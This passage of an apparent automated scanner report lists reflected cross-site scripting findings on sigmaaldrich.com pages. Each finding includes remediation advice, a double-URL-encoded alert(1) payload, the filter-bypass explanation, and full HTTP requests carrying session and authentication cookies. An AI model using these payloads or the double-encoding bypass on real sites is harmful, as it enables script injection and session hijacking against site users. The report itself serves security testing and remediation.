bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:44 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-services1fef4";alert(1)//e974b804620/mass-spectrometry.html","E404") ;
   </script>
...[SNIP]...

1.564. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/mass-spectrometry.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a19c7%2522%253balert%25281%2529%252f%252fc2f9597928f was submitted in the REST URL parameter 3. This input was echoed as a19c7";alert(1)//c2f9597928f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-services/a19c7%2522%253balert%25281%2529%252f%252fc2f9597928f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-services/a19c7";alert(1)//c2f9597928f","E404") ;
   </script>
...[SNIP]...

1.565. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/metabolomics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42b6e%2522%253balert%25281%2529%252f%252f88de7cd0455 was submitted in the REST URL parameter 1. This input was echoed as 42b6e";alert(1)//88de7cd0455 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science42b6e%2522%253balert%25281%2529%252f%252f88de7cd0455/metabolomics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28934
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science42b6e";alert(1)//88de7cd0455/metabolomics.html","E404") ;
   </script>
...[SNIP]...

1.566. http://www.sigmaaldrich.com/life-science/metabolomics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/metabolomics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b17ba%2522%253balert%25281%2529%252f%252f229ac1f2cd7 was submitted in the REST URL parameter 2. This input was echoed as b17ba";alert(1)//229ac1f2cd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/b17ba%2522%253balert%25281%2529%252f%252f229ac1f2cd7 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/b17ba";alert(1)//229ac1f2cd7","E404") ;
   </script>
...[SNIP]...

1.567. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/molecular-biology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32bb1%2522%253balert%25281%2529%252f%252f9b8c4253cb3 was submitted in the REST URL parameter 1. This input was echoed as 32bb1";alert(1)//9b8c4253cb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science32bb1%2522%253balert%25281%2529%252f%252f9b8c4253cb3/molecular-biology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science32bb1";alert(1)//9b8c4253cb3/molecular-biology.html","E404") ;
   </script>
...[SNIP]...

1.568. http://www.sigmaaldrich.com/life-science/molecular-biology.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/molecular-biology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12be%2522%253balert%25281%2529%252f%252fd73e7e9ff3b was submitted in the REST URL parameter 2. This input was echoed as a12be";alert(1)//d73e7e9ff3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/a12be%2522%253balert%25281%2529%252f%252fd73e7e9ff3b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


